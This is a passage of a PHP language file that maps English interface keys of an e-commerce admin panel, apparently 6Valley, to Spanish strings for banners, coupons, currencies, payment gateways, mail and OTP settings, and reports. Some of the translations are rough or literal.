pancartas', 'search_by_Banner_Type' => 'buscar por tipo de banner', 'add_banner' => 'añadir banner', 'published' => 'publicado', 'Top Side Banner' => 'Banner lateral superior', 'Sidebar Banner' => 'Banner de la barra lateral', 'Header Banner' => 'Banner de encabezado', 'Main Section Banner' => 'Banner de la sección principal', 'Popup Banner' => 'Banner emergente', 'Footer Banner' => 'Banner de pie de página', 'Main Banner' => 'Banner principal', 'banner_published_successfully' => 'banner publicado con éxito', 'banner_unpublished_successfully' => 'banner no publicado con éxito', 'are_you_sure_delete_this_banner' => '¿Estás seguro de eliminar este banner?', 'banner_deleted_successfully' => 'banner eliminado con éxito', 'banner_update_form' => 'formulario de actualización de banner', 'Main_Banner' => 'Banner principal', 'Footer_Banner' => 'Pie de página Banner', 'Popup_Banner' => 'Banner emergente', 'enter_url' => 'introducir URL', 'banner_updated_successfully' => 'banner actualizado con éxito', 'coupon_Add' => 'cupón Añadir', 'coupon_setup' => 'cupón configuración', 'coupon_type' => 'cupón tipo', 'select_coupon_type' => 'seleccionar tipo de cupón', 'discount_on_Purchase' => 'descuento en compra', 'free_Delivery' => 'Entrega gratis', 'first_Order' => 'primer orden', 'coupon_title' => 'cupón título', 'title' => 'título', 'coupon_bearer' => 'cupón portador', 'select_coupon_bearer' => 'seleccionar cupón portador', 'admin' => 'administración', 'select_seller' => 'seleccionar vendedor', 'select_customer' => 'seleccionar cliente', 'all_customer' => 'todos clientes', 'limit_for_same_user' => 'Límite para el mismo usuario', 'percentage' => 'porcentaje', 'discount_Amount' => 'importe de descuento', 'minimum_purchase' => 'compra mínima', 'maximum_discount' => 'descuento máximo', 'start_date' => 'fecha de inicio', 'expire_date' => 'fecha de caducidad', 'coupon_list' => 'lista de cupones', 'search_by_Title_or_Code_or_Discount_Type' => 'buscar por título o código o tipo de descuento', 'duration' => 'duración', 'user_limit' => 'límite usuario', 'discount_bearer' => 'descuento portador', 'discount on purchase' => 'descuento en la compra', 'limit' => 'límite', 'used' => 'usado', 'first order' => 'primer orden', 'free delivery' => 'entrega gratis', 'currency' => 'divisa', 'add_New_Currency' => 'añadir nueva moneda', 'enter_currency_name' => 'ingrese nombre de la moneda', 'enter_currency_symbol' => 'ingresar símbolo de moneda', 'enter_currency_code' => 'ingrese código moneda', 'enter_currency_exchange_rate' => 'entrar tasa de cambio de moneda', 'system_default_currency' => 'moneda predeterminada del sistema', 'currency_table' => 'tabla de monedas', 'search_Currency_Name_or_Currency_Code' => 'buscar nombre de moneda o código de moneda', 'currency_name' => 'moneda nombre', 'currency_symbol' => 'símbolo de moneda', 'currency_code' => 'código de moneda', 'exchange_rate' => 'tipo de cambio', 'all_input_field_is_required' => 'todos los campos de entrada son obligatorios', 'are_you_sure_delete_this' => 'Estas seguro borrar esto', 'currency_removed_successfully' => 'moneda eliminada con éxito', 'this_Currency_cannot_be_removed_due_to_payment_gateway_dependency' => 'esta moneda no puede ser eliminada debido a la dependencia de la pasarela de pago', 'default currency can not be deleted!to delete change the default currency first!' => '¡La moneda predeterminada no se puede eliminar! Para eliminar, ¡cambie primero la moneda predeterminada!', 'coupon_bearer_is_required!' => 'cupón portador es requerido!', 'select_seller_is_required!' => '¡Se requiere vendedor seleccionado!', 'select_customer_is_required!' => '¡se requiere seleccionar cliente!', 'limit_for_same_user_is_required!' => 'Se requiere límite para el mismo usuario!', 'discount_type_is_required!' => 'descuento tipo es requerido!', 'discount_amount_is_required!' => 'descuento cantidad es requerido!', 'minimum_purchase_is_required!' => '¡la compra mínima es requerida!', 'Coupon_added_successfully' => 'Cupón agregado con éxito', 'Coupon_status_updated' => 'Estado del cupón actualizado', 'coupon_Edit' => 'cupón Editar', 'coupon_update' => 'cupón actualización', 'select_Coupon_Type' => 'seleccionar tipo de cupón', 'all_seller' => 'todo vendedor', 'inhouse' => 'interno', 'Update' => 'Actualizar', 'coupon_bearer_is_required' => 'cupón portador es requerido', 'select_seller_is_required' => 'Se requiere seleccionar vendedor', 'select_customer_is_required' => 'Se requiere seleccionar cliente', 'limit_for_same_user_is_required' => 'Se requiere límite para el mismo usuario', 'discount_type_is_required' => 'descuento tipo es requerido', 'discount_amount_is_required' => 'descuento cantidad es requerido', 'minimum_purchase_is_required' => 'compra mínima es requerida', 'Coupon_updated_successfully' => 'Cupón actualizado con éxito', 'off' => 'apagado', 'Coupon_deleted_successfully' => 'Cupón eliminado con éxito', 'flash_Deal' => 'oferta flash', 'flash_deals' => 'ofertas flash', 'end_date' => 'fecha final', 'upload_image' => 'cargar imagen', 'flash_deal_table' => 'tabla de ofertas relámpago', 'search_by_Title' => 'buscar por título', 'active_products' => 'productos activos', 'publish' => 'publicar', 'active' => 'activo', 'add_Product' => 'Agregar producto', 'expired' => 'venció', 'deal_added_successfully' => 'trato agregado con éxito', 'flash_Deal_Update' => 'actualización oferta flash', 'flash_deals_update' => 'flash ofertas actualizar', 'upload_Image' => 'cargar imagen', 'This is not an image file' => 'Este no es un archivo de imagen.', 'deal_updated_successfully' => 'trato actualizado con éxito', 'deal_Product' => 'trato Producto', 'add_new_product' => 'añadir nuevo producto', 'select_product' => 'seleccionar producto', 'product_Table' => 'tabla producto', 'are_you_sure_remove_this_product' => 'está seguro de que elimine este producto', 'product_removed_successfully' => 'producto eliminado con éxito', 'DB_clean' => 'DB limpio', 'this_page_contains_sensitive_information.Make_sure_before_changing.' => 'esta página contiene información sensible.Asegúrese antes de cambiar.', 'admin wallets' => 'carteras de administrador', 'admin wallet histori...' => 'Historial de monedero de administrador...', 'billing addresses' => 'direcciones de facturación', 'carts' => 'carros', 'cart shippings' => 'envios de carro', 'category shipping co...' => 'categoría envío co...', 'chattings' => 'chateando', 'contacts' => 'contactos', 'coupons' => 'cupones', 'customer wallets' => 'carteras de clientes', 'customer wallet hist...' => 'historial de billetera del cliente...', 'deal of the days' => 'trato de los días', 'deliveryman notifica...' => 'repartidor notification', 'deliveryman wallets' => 'repartidor carteras', 'delivery country cod...' => 'código del país de entrega...', 'delivery histories' => 'historiales de entrega', 'delivery man transac...' => 'Transacción del repartidor', 'delivery men' => 'repartidores', 'delivery zip codes' => 'códigos postales de entrega', 'emergency contacts' => 'contactos de emergencia', 'feature deals' => 'ofertas de características', 'flash deals' => 'ofertas relámpago', 'flash deal products' => 'productos de oferta relámpago', 'help topics' => 'temas de ayuda', 'jobs' => 'trabajos', 'loyalty point transa...' => 'Transacción de puntos de fidelidad', 'notifications' => 'notificaciones', 'order details' => 'detalles del pedido', 'order expected deliv...' => 'orden de entrega prevista...', 'order status histori...' => 'historial de estado de pedidos...', 'order transactions' => 'ordenar transacciones', 'paytabs invoices' => 'facturas de pago', 'product compares' => 'comparación de productos', 'product stocks' => 'existencias de productos', 'product tag' => 'etiqueta del producto', 'refund requests' => 'solicitudes de reembolso', 'refund statuses' => 'estados de reembolso', 'refund transactions' => 'transacciones de reembolso', 'search functions' => 'funciones de búsqueda', 'seller wallets' => 'vendedor de carteras', 'seller wallet histor...' => 'historial de la billetera del vendedor...', 'shipping addresses' => 'Dirección de Envío', 'shipping methods' => 'Métodos de envío', 'shipping types' => 'tipos de envío', 'shops' => 'tiendas', 'shop followers' => 'seguidores de la tienda', 'subscriptions' => 'suscripciones', 'support tickets' => 'tickets de soporte', 'support ticket convs' => 'conversiones de tickets de soporte', 'transactions' => 'actas', 'translations' => 'traducciones', 'wallet transactions' => 'transacciones de billetera', 'wishlists' => 'listas de deseos', 'withdrawal methods' => 'métodos de retiro', 'withdraw requests' => 'retirar solicitudes', 'clear' => 'claro', 'sensitive_data' => 'informacion delicada', 'make_sure_before_changing.' => 'asegurarse antes de cambiar.', 'cancelled' => 'cancelado', 'system_setup' => 'configuración del sistema', 'upload_the_updated_file' => 'cargar el archivo actualizado', 'this_module_will_run_for_updates_after_version_13.1' => 'este módulo se ejecutará para actualizaciones después de la versión 13.1', 'codecanyon_username' => 'nombre de usuario codecanyon', 'purchase_code' => 'código de compra', 'choose_updated_file' => 'elegir archivo actualizado', 'How_the_Setting_Works' => 'Cómo funciona la configuración', 'get_your_zip_file_from_the_purchased_theme_and_upload_it_and_activate_theme_with_your_Codecanyon_username_and_purchase_code' => 'obtenga su archivo zip del tema comprado y súbalo y active el tema con su nombre de usuario de Codecanyon y código de compra', 'now_you’ll_be_successfully_able_to_use_the_theme_for_your_6Valley_website' => 'ahora podrá usar con éxito el tema para su sitio web 6Valley', 'N:B you_can_upload_only_6Valley’s_theme_templates' => 'N:B solo puede cargar plantillas de temas de 6Valley', 'Got_It' => 'Entiendo', 'upload_theme' => 'cargar tema', 'please_make_sure' => 'por favor asegúrese', 'your_server_php' => 'tu servidor php', 'value_is_greater_or_equal_to_20MB' => 'valor es rallador o igual a 20MB', 'current_value_is' => 'Current value is', 'upload' => 'subir', 'do_you_want_to_shift_in_another_theme' => 'quieres cambiar en otro tema', 'if_you_shift_in_another_theme' => 'Si cambias a otro tema', 'everything_will_be_rearranged' => 'todo será reorganizado', 'according_to_theme' => 'según el tema', 'are_you_sure_you_want_to_delete_the_theme' => '¿está seguro que quiere eliminar el tema', 'once_you_delete' => 'una vez usted elimina', 'you_will_lost_the_this_theme' => 'perderás el este tema', 'updated successfully!' => 'actualizado correctamente!', 'deal_Of_The_Day' => 'oferta del día', 'select_Product' => 'seleccionar producto', 'deal_Update' => 'trato Actualizar', 'update_Deal_of_The_Day' => 'actualización oferta del día', 'feature_Deal' => 'Oferta de características', 'feature_deal' => 'característica oferta', 'feature_deal_Table' => 'Tabla de ofertas de funciones', 'search by Title' => 'buscar por título', 'terms_and_condition' => 'términos y Condiciones', 'terms_&_Conditions' => 'Términos y condiciones', 'privacy_Policy' => 'política de privacidad', 'refund_Policy' => 'politica de reembolso', 'return_Policy' => 'política de devoluciones', 'cancellation_Policy' => 'política de cancelación', 'about_Us' => 'sobre nosotros', 'Terms_and_Condition_Updated_successfully' => 'Términos y condiciones actualizados con éxito', 'add_new_notification' => 'agregar nueva notificación', 'push_notification' => 'notificación de inserción', 'new_notification' => 'nueva notificación', 'send_Notification' => 'Enviar notificación', 'push_notification_table' => 'Tabla de notificaciones push', 'search_by_title' => 'buscar por título', 'notification_count' => 'notificación recuento', 'resend' => 'reenviar', 'you_will_not_be able_to_revert_this' => 'usted no podrá revertir esto', 'notification_deleted_successfully' => 'notificación eliminada con éxito', 'resend_notification' => 'reenviar notificación', 'privacy_policy' => 'política de privacidad', 'refund policy' => 'politica de reembolso', 'return policy' => 'política de devoluciones', 'notification_sent_successfully' => 'notificación enviada con éxito', 'cancellation policy' => 'política de cancelación', 'about_us' => 'sobre nosotros', 'push_notification_successfully' => 'notificación push con éxito', 'help_topic_Table' => 'tabla tema de ayuda', 'add_FAQ' => 'añadir preguntas frecuentes', 'question' => 'pregunta', 'answer' => 'respuesta', 'ranking' => 'clasificación', 'add_Help_Topic' => 'agregar tema de ayuda', 'type_Question' => 'tipo pregunta', 'type_Answer' => 'tipo respuesta', 'edit_Modal_Help_Topic' => 'editar tema de ayuda modal', 'are_you_sure_delete_this_FAQ' => '¿Estás seguro de eliminar estas preguntas frecuentes?', 'FAQ_deleted_successfully' => 'Preguntas frecuentes eliminadas con éxito', 'update_Notification' => 'actualización Notificación', 'push_notification_update' => 'actualización de notificaciones push', 'notification_updated_successfully' => 'notificación actualizada con éxito', 'FAQ_Update_successfully' => 'FAQ Actualizar con éxito', 'announcement_Setup' => 'anuncio Configuración', 'inactive' => 'inactivo', 'background_color' => 'color de fondo', 'text_color' => 'color de texto', 'text' => 'texto', 'SMS_Module_Setup' => 'Configuración módulo SMS', 'SMS_Config' => 'Configuración SMS', 'Mail_Config' => 'Configuración de correo', 'Payment_Methods' => 'Métodos de pago', 'Recaptcha' => 'recaptcha', 'Google_Map_APIs' => 'API de mapas de Google', 'Push_Notification_Setup' => 'Configuración de notificaciones push', 'Social_Media_Login' => 'Inicio de sesión en redes sociales', 'Social_Media_Chat' => 'Charla en redes sociales', 'releans_sms' => 'releans sms', 'NB_:_#OTP#_will_be_replace_with_otp' => 'NB: #OTP# será reemplazado por otp', 'api_key' => 'Clave API', 'from' => 'de', 'otp_template' => 'plantilla otp', 'twilio_sms' => 'twilio sms', 'sid' => 'sid', 'messaging_service_sid' => 'servicio de mensajería sid', 'token' => 'simbólico', 'nexmo_sms' => 'nexmo sms', 'api_secret' => 'api secreto', '2factor_sms' => '2factor sms', 'EX_of_SMS_providers_template_:_your_OTP_is_XXXX_here_please_check' => 'EX of SMS providers template : su OTP es XXXX aquí por favor compruébelo', 'NB_:_XXXX_will_be_replace_with_otp' => 'NB: XXXX se reemplazará con otp', 'msg91_sms' => 'msg91 sms', 'NB_:_Keep_an_OTP_variable_in_your_SMS_providers_OTP_Template' => 'NB : Mantener una variable OTP en su plantilla OTP de proveedores SMS', 'template_id' => 'id plantilla', 'auth_key' => 'Clave de autenticación', 'announcement_updated_successfully' => 'anuncio actualizado con éxito', 'contact_List' => 'lista de contactos', 'customer_message' => 'mensaje cliente', 'customer_message_table' => 'tabla mensaje cliente', 'search_by_Name_or_Mobile_No_or_Email' => 'buscar por nombre o número de móvil o correo electrónico', 'contact_Info' => 'Datos de contacto', 'subject' => 'sujeto', 'contact_deleted_successfully' => 'contacto eliminado con exito', 'mail_Config' => 'configuración de correo', 'test_your_email_integration' => 'prueba tu integración de correo electrónico', 'mail' => 'correo', 'send_mail' => 'enviar correo', 'smtp_mail_config' => 'configuración de correo smtp', 'smtp_mail' => 'correo smtp', 'mailer_name' => 'nombre del remitente', 'host' => 'anfitrión', 'driver' => 'conductor', 'port' => 'puerto', 'username' => 'nombre de usuario', 'email_id' => 'identificación de correo', 'encryption' => 'cifrado', 'sendgrid_mail_config' => 'enviargrid mail config', 'sendgrid_mail' => 'enviargrid mail', 'a_test_mail_will_be_sent_to_your_email' => 'un correo de prueba se enviará a su correo electrónico', 'email_configuration_error' => 'error de configuracion de correo electronico', 'email_configured_perfectly' => 'email configurado perfectamente', 'email_status_is_not_active' => 'el estado del correo electrónico no está activo', 'invalid_email_address' => 'dirección de correo inválida', 'add_Fund' => 'añadir fondo', 'reference' => 'referencia', 'filter_options' => 'opciones de filtro', 'from_date' => 'partir de la fecha', 'to_date' => 'hasta la fecha', 'select_transaction_type' => 'seleccionar tipo de transacción', 'add_fund_by_admin' => 'añadir fondo por administrador', 'add_fund_by_customer' => 'agregar fondo por cliente', 'refund_order' => 'pedido de reembolso', 'customer_loyalty_point' => 'punto de lealtad del cliente', 'order_place' => 'pedido lugar', 'filter' => 'filtrar', 'summary' => 'resumen', 'debit' => 'débito', 'credit' => 'crédito', 'balance' => 'balance', 'transaction_ID' => 'ID de transacción', 'Customer' => 'Cliente', 'transaction_type' => 'tipo de transacción', 'created_at' => 'Creado en', 'order_refund' => 'reembolso del pedido', 'loyalty_point' => 'punto de lealtad', 'you_want_to_add_fund' => 'usted quiere agregar fondo', 'to' => 'a', 'to_wallet' => 'a billetera', 'fund_added_successfully' => 'fondo agregado con éxito', 'Test_Email_Sender' => 'Probar remitente de correo electrónico', 'Email Verification' => 'verificacion de email', 'mail_received_successfully' => 'correo recibido con éxito', 'PAYMENT_METHOD' => 'MÉTODO DE PAGO', 'digital_payment' => 'pago digital', 'offline_payment' => 'pago fuera de línea', 'SSLCOMMERZ' => 'SSLCOMMERZ', 'choose_environment' => 'elegir entorno', 'sandbox' => 'salvadera', 'store_ID' => 'identificación de la tienda', 'store_password' => 'tienda contraseña', 'paypal' => 'PayPal', 'Paypal_Client_ID' => 'Paypal Client ID', 'paypal_Secret' => 'paypal secreto', 'stripe' => 'raya', 'published_key' => 'clave publicada', 'razor_pay' => 'razor pay', 'secret' => 'secreto', 'senang_pay' => 'Senang pay', 'callback_URI' => 'URI de devolución de llamada', 'copy_URI' => 'copiar URI', 'secret_key' => 'llave secreta', 'merchant_ID' => 'Identificación del comerciante', 'paytabs' => 'fichas de pago', 'profile_id' => 'Perfil Id', 'server_key' => 'clave servidor', 'base_url_by_region' => 'URL base por región', 'paystack' => 'pila de pago', 'public_Key' => 'Llave pública', 'secret_Key' => 'llave secreta', 'payment_Url' => 'URL pago', 'merchant_Email' => 'comerciante Correo electrónico', 'paymob_accept' => 'paymob aceptar', 'iframe_id' => 'iframe id', 'integration_id' => 'id integración', 'HMAC' => 'HMAC', 'fawry_pay' => 'fawry pay', 'merchant_code' => 'código comerciante', 'security_key' => 'clave de seguridad', 'mercadopago' => 'mercadopago', 'access_token' => 'token de acceso', 'liqpay' => 'liqpay', 'private_Key' => 'llave privada', 'flutterwave' => 'aleteo', 'hash' => 'picadillo', 'paytm' => 'pago', 'paytm_merchant_key' => 'paytm merchant key', 'paytm_merchant_mid' => 'paytm merchant mid', 'paytm_merchant_website' => 'paytm merchant website', 'bkash' => 'bkash', 'Copied_to_the_clipboard' => 'Copiado en el portapapeles', 'successfully_updated' => 'actualizado exitosamente', 'general_settings' => 'Configuración general', 'general' => 'general', 'app_Settings' => 'Ajustes de Aplicacion', 'in-House_Shop' => 'en-House Shop', 'refund' => 'reembolso', 'Product' => 'Producto', 'delivery_Restriction' => 'Restricción entrega', 'cookie_Settings' => 'cookie Configuración', 'OTP_and_Login_Setup' => 'OTP y Configuración de inicio de sesión', 'maintenance_mode' => 'modo mantenimiento', 'by_turning_on_maintaince_mode _all_your_app_and_customer_side_website_will_be_off._Only_admin_panel_and_seller_panel_will_be_functional' => 'al activar el modo de mantenimiento, toda su aplicación y el sitio web del lado del cliente estarán apagados. Solo el panel de administración y el panel de vendedor serán funcionales.', 'company_Information' => 'información empresa', 'company_Name' => 'nombre de empresa', 'company_address' => 'Dirección de la empresa', 'your_shop_address' => 'dirección de su tienda', 'latitude' => 'latitud', 'longitude' => 'longitud', 'time_zone' => 'zona horaria', 'business_Information' => 'información de negocios', 'currency_Position' => 'posición moneda', 'left' => 'izquierda', 'right' => 'bien', 'forgot_password_verification_by' => 'olvidé contraseña verificación por', 'OTP_verification' => 'OTP verificación', 'on' => 'en', 'email_verification' => 'verificacion de email', 'order_verification' => 'verificación pedido', 'Company_Copyright_Text' => 'Texto de copyright de la empresa', 'company_copyright_text' => 'texto de derechos de autor de la empresa', 'pagination_settings' => 'configuración de paginación', 'digit_after_decimal_point' => 'dígito después del punto decimal', 'website_Color' => 'sitio web Color', 'primary_Color' => 'color primario', 'secondary_Color' => 'color secundario', 'primary_Light_Color' => 'color de luz principal', 'website_Header_Logo' => 'Logotipo del encabezado del sitio web', 'website_Footer_Logo' => 'sitio web Foter Logo', '250x60 px' => '250x60 píxeles', 'website_Favicon' => 'sitio web Favicon', 'loading_Gif' => 'cargando Gif', 'App_Logo' => 'Logotipo de la aplicación', 'be_careful_before_you_turn_on/off_maintenance_mode' => 'tenga cuidado antes de activar/desactivar el modo de mantenimiento', 'both_Phone_&_Email_verification_can_not_be_active_at_a_time' => 'ambos teléfono y verificación de correo electrónico no pueden estar activos en un momento', 'app_settings' => 'Ajustes de Aplicacion', 'Apple_Store_Status' => 'Apple Store estado', 'link' => 'enlace', 'google_play_store_Status' => 'estado de la tienda de google play', 'inhouse_shop' => 'tienda interna', 'temporary_close' => 'cierre temporal', 'by_turning_on_temporary_close_mode _your_shop_will_be_shown_as_temporary_off_in_the_website_and_app_for_the_customers.' => 'al activar el modo de cierre temporal su tienda se mostrará como desactivada temporalmente en el sitio web y la aplicación para los clientes.', 'they_cannot_purchase_or_place_order_from_your_shop' => 'ellos no pueden comprar o hacer un pedido en su tienda', 'go_to_Vacation_Mode' => 'ir a modo vacaciones', 'shop_cover_image' => 'imagen de portada de la tienda', 'secondary_banner' => 'banner secundario', 'Upload' => 'Subir', 'secondary' => 'secundario', 'Banner' => 'Bandera', 'vacation_Mode' => 'modo vacaciones', 'set_vacation_mode_for_shop_means_you_will_be_not_available_receive_order_and_provider_products_for_placed_order_at_that_time' => 'establecer modo vacaciones para comprar significa que no estará disponible recibir pedido y productos del proveedor para pedido realizado a esa hora', 'vacation_Start' => 'vacaciones Inicio', 'vacation_End' => 'vacaciones fin', 'vacation_Note' => 'vacaciones Nota', 'temporary_close_updated_successfully' => 'cierre temporal actualizado con éxito', 'seller_Information' => 'Información del vendedor', 'sales_Commission' => 'Comisión de ventas', 'default_Sales_Commission' => 'comisión de venta predeterminada', 'seller_Registration' => 'vendedor Registro', 'seller_Registration_on/off' => 'vendedor Registration on/off', 'turn_on' => 'encender', 'turn_off' => 'apagar', 'seller_POS' => 'vendedor POS', 'seller_POS_permission_on/off' => 'vendedor POS permiso activado/desactivado', 'business_mode' => 'modo negocio', 'for_single_vendor_operation_deactive_all_seller' => 'para la operación de un solo vendedor, desactive todos los vendedores', 'single_vendor' => 'único vendedor', 'now_your_multi_vendor_business_mode_is_opening_you_can_add_new_seller' => 'ahora que se está abriendo su modo comercial de múltiples proveedores, puede agregar un nuevo vendedor', 'multi_vendor' => 'multi vendedor', 'admin_approval_for_products' => 'admin aprobación para productos', 'approval_for_products' => 'aprobación para productos', 'new_product' => 'nuevo producto', 'product_wise_shipping_cost' => 'producto sabio costo de envío', 'if_the_shipping_responsibility_is_inhouse_and_product_wise_shipping_is_activated_then_this_function_will_work' => 'si la responsabilidad del envío es interno y el envío prudente del producto está activado entonces esta función funcionará', 'customer_settings' => 'configuración cliente', 'customer_wallet_settings' => 'configuración billetera cliente', 'refund_to_wallet' => 'reembolso a billetera', 'refund_to_wallet_hint' => 'sugerencia de reembolso a billetera', 'show_hide_food_menu' => 'mostrar ocultar menú comida', 'how_much_point' => 'cuanto punto', 'percentage_of_loyalty_point_on_order_amount' => 'porcentaje de punto de fidelidad en cantidad de pedido', 'minimum_point_to_transfer' => 'punto mínimo para transferir', 'refund_settings' => 'configuración de reembolso', 'refund_request_after_order_within' => 'solicitud de reembolso después del pedido dentro', 'days' => 'días', 'shipping_responsibility' => 'responsabilidad envio', 'inhouse_shipping' => 'envío interno', 'seller_wise_shipping' => 'vendedor sabio envío', 'for_inhouse_deliver' => 'para entregar en casa', 'order_wise' => 'orden sabio', 'category_wise' => 'categoría sabia', 'product_wise' => 'producto sabio', 'please_make_sure_all_the product s_delivery_charges_are_up_to_date.' => 'por favor, asegúrese de que todos los gastos de envío del producto estén actualizados.', 'update_category_shipping_cost' => 'actualizar categoría costo de envío', 'category_name' => 'nombre de la categoría', 'cost_per_product' => 'costo por producto', 'multiply_with_QTY' => 'multiplicar con cantidad', 'add_order_wise_shipping' => 'agregar orden de envío inteligente', '4_to_6_days' => '4 a 6 días', 'cost' => 'costo', 'order_wise_shipping_method' => 'Ordene el método de envío inteligente', 'shipping_responsibility_updated_successfully' => 'responsabilidad de envío actualizada con éxito', 'shipping_method_updated_successfully' => 'método envío actualizado con éxito', 'order_wise_shipping_method_Status_updated_successfully' => 'Ordene el método de envío inteligente Estado actualizado con éxito', 'Order_Wise_Shipping_Method_deleted_successfully' => 'Order Wise Shipping Method eliminado con éxito', 'order_settings' => 'ajustes de pedido', 'order_Settings' => 'Ajustes de pedido', 'show_Billing_Address_In_Checkout' => 'mostrar la dirección de facturación en el pago', 'deactive' => 'inactivo', 'product_settings' => 'configuración producto', 'minimum_stock_limit_for_warning' => 'stock mínimo límite para advertencia', 123 => '123', 'digital_Product' => 'producto digital', 'digital_product_on/off' => 'producto digital encendido/apagado', 'product_Brand' => 'producto de marca', 'product_Brand_on/off' => 'producto marca activado/desactivado', 'delivery_available_country' => 'país de entrega disponible', 'sl' => 'SL', 'country_name' => 'nombre del país', 'delivery_available_zip_code_area' => 'delivery disponible zip code area', 'enter_zip_code' => 'Introduzca código postal', 'multiple_zip_codes_can_be_inputted_by_comma_separating_or_pressing_enter_button' => 'se pueden ingresar varios códigos postales separándolos con comas o presionando el botón Intro', 'cookie_settings' => 'configuración de cookies', 'cookie_text' => 'texto cookie', 'OTP_setup' => 'OTP configuración', 'maximum OTP hit' => 'impacto máximo de OTP', 'The maximum OTP hit is a measure of how many times a specific one-time password has been generated and used within a time.' => 'El éxito máximo de OTP es una medida de cuántas veces se ha generado y utilizado una contraseña única específica en un tiempo.', 'OTP resend time' => 'Tiempo de reenvío de OTP', 'If the user fails to get the OTP within a certain time user can request a resend' => 'Si el usuario no obtiene la OTP dentro de un tiempo determinado, el usuario puede solicitar un reenvío', 'in_seconds' => 'en segundos', 'temporary_block_time' => 'tiempo de bloqueo temporal', 'Temporary OTP block time refers to a security measure implemented by systems to restrict access to OTP service for a specified period of time for wrong OTP submission.' => 'El tiempo de bloqueo temporal de OTP se refiere a una medida de seguridad implementada por los sistemas para restringir el acceso al servicio OTP durante un período de tiempo específico para el envío incorrecto de OTP.', 'maximum Login hit' => 'hit de inicio de sesión máximo', 'The maximum login hit is a measure of how many times a user can submit password within a time.' => 'El éxito máximo de inicio de sesión es una medida de cuántas veces un usuario puede enviar la contraseña dentro de un tiempo.', 'temporary_login_block_time' => 'tiempo de bloqueo de conexión temporal', 'Temporary login block time refers to a security measure implemented by systems to restrict access for a specified period of time for wrong Password submission' => 'El tiempo de bloqueo de inicio de sesión temporal se refiere a una medida de seguridad implementada por los sistemas para restringir el acceso durante un período de tiempo específico para el envío de una contraseña incorrecta.', 'Settings_updated' => 'Ajustes actualizan', 'cookie_settings_updated_successfully' => 'cookie settings updated successfully', 'digital_product_updated' => 'producto digital actualizado', 'product_brand_updated' => 'producto marca actualizado', 'contact_View' => 'contacto Ver', 'message_view' => 'mensaje vista', 'user_details' => 'Detalles de usuario', 'feedback' => 'comentario', 'please_send_a_Feedback' => 'por favor enviar un comentario', 'already_check' => 'ya cheque', 'seen' => 'visto', 'mobile_no' => 'no móviles', 'message_Log' => 'mensaje Registro', 'Jack' => 'Jacobo', 'no_reply' => 'ninguna respuesta', 'send_Mail' => 'enviar correo', 'configure_your_mail_setup_first' => 'configure su configuración de correo primero', 'mail_Body' => 'correo cuerpo', 'Password Reset' => 'Restablecimiento de contraseña', 'Category_cost_successfully_updated' => 'Costo de categoría actualizado con éxito', 'support_ticket' => 'ticket soporte', 'search_Ticket_by_Subject_or_status' => 'buscar ticket por asunto o estado', 'all_Priority' => 'toda prioridad', 'low' => 'bajo', 'medium' => 'medio', 'high' => 'alto', 'urgent' => 'urgente', 'all_Status' => 'todo estado', 'open' => 'abierto', 'High' => 'Alto', 'Website problem' => 'Problema del sitio web', 'Medium' => 'Medio', 'Complaint' => 'Queja', 'Info inquiry' => 'Consulta de información', 'Website Problem' => 'Problema del sitio web', 'leave_a_Message' => 'dejar un mensaje', 'write_your_message_here' => 'escriba su mensaje aquí', 'please write the message' => 'por favor escribe el mensaje', 'reply' => 'responder', 'earning_Reports' => 'informes de ganancias', 'admin_Earning' => 'admin Ganancias', 'seller_Earning' => 'vendedor ganancias', 'filter_Data' => 'filtrar datos', 'custom_Date' => 'fecha personalizada', 'total_earnings' => 'Ganancias Totales', 'total_In_House_Products' => 'total de productos internos', 'total_Shop' => 'tienda total', 'earning_Statistics' => 'estadísticas ganancias', 'total_Earnings' => 'Ganancias Totales', 'payment_Statistics' => 'pago Estadísticas', 'payments_Amount' => 'pagos Importe', 'cash_payments' => 'pagos en efectivo', 'digital_payments' => 'pagos digitales', 'offline_payments' => 'pagos fuera de línea', 'in-House_Earning' => 'ingresos internos', 'commission_Earning' => 'comisión Ganancia', 'earn_From_Shipping' => 'ganar de envío', 'discount_Given' => 'descuento dado', 'VAT/TAX' => 'IVA/IMPUESTOS', 'refund_Given' => 'reembolso dado', 'total_Earning' => 'ganancias totales', 'cash_Payments' => 'pagos en efectivo', 'digital_Payments' => 'pagos digitales', 'wallet_Payments' => 'wallet Pagos', 'admin_Earning_Report' => 'admin Reporte de ganancias', 'details' => 'detalles', 'in_House_earning' => 'en la ganancia de la casa', 'admin_Commission' => 'admin Comisión', 'earning_From_Shipping' => 'ganar de envío', 'total_Tax' => 'total impuestos', 'refund_day_limit_updated' => 'límite de días de reembolso actualizado', 'start Date' => 'fecha de inicio', 'end Date' => 'fecha final', 'total_Seller' => 'vendedor total', 'total_Seller_Products' => 'Productos totales del vendedor', 'denied' => 'denegado', 'pending_Request' => 'Solicitud pendiente', 'average_Earning_Value' => 'valor ganancia promedio', 'seller_Wallet_Status' => 'estado de la billetera del vendedor', 'wallet_Amount' => 'monedero Cantidad', 'withdrawble_Balance' => 'Saldo retirable', 'pending_Withdraws' => 'Retiros pendientes', 'seller_Info' => 'vendedor Info', 'earn_From_Order' => 'ganar de pedido', 'commission_Given' => 'comisión dada', 'tax_Collected' => 'impuestos recaudados', 'inhouse_product_sale Report' => 'Informe inhouse product sale', 'inhouse_sale' => 'venta interna', 'product_Name' => 'nombre del producto', 'seller_product_sale_Report' => 'vendedor producto venta Informe', 'seller_Reports' => 'vendedor Informes', 'all_sellers' => 'todos los vendedores', 'total_Orders' => 'pedidos totales', 'this_count_is_the_summation_of' => 'este recuento es la suma de', 'and' => 'y', 'returned_orders' => 'pedidos devueltos', 'ongoing' => 'en curso', 'out_for_delivery_orders' => 'fuera para pedidos de entrega', 'completed' => 'terminado', 'this_count_is_the_summation_of_delivered_orders' => 'este recuento es la suma de los pedidos entregados', 'total_Deliveryman' => 'total repartidor', 'order_Statistics' => 'Estadísticas de pedidos', 'total_order_amount' => 'monto pedido total', 'total_Shop_Earnings' => 'ganancias totales de la tienda', 'seller-Info' => 'Información del vendedor', 'refund_Rate' => 'tarifa de reembolso', 'customer_settings_updated_successfully' => 'configuración cliente actualizada con éxito', 'Seller_pos_permission_Updated_successfully' => 'Vendedor pos permiso Actualizado con éxito', 'back_to_seller_list' => 'volver a la lista de vendedores', 'setting' => 'configuración', 'transaction' => 'transacción', 'aready_Withdrawn' => 'aready Retirado', 'seller_Account' => 'cuenta vendedor', 'suspend' => 'suspender', 'shop_Info' => 'tienda Info', 'bank_info' => 'información bancaria', 'bank_name' => 'Nombre del banco', 'branch' => 'rama', 'holder_name' => 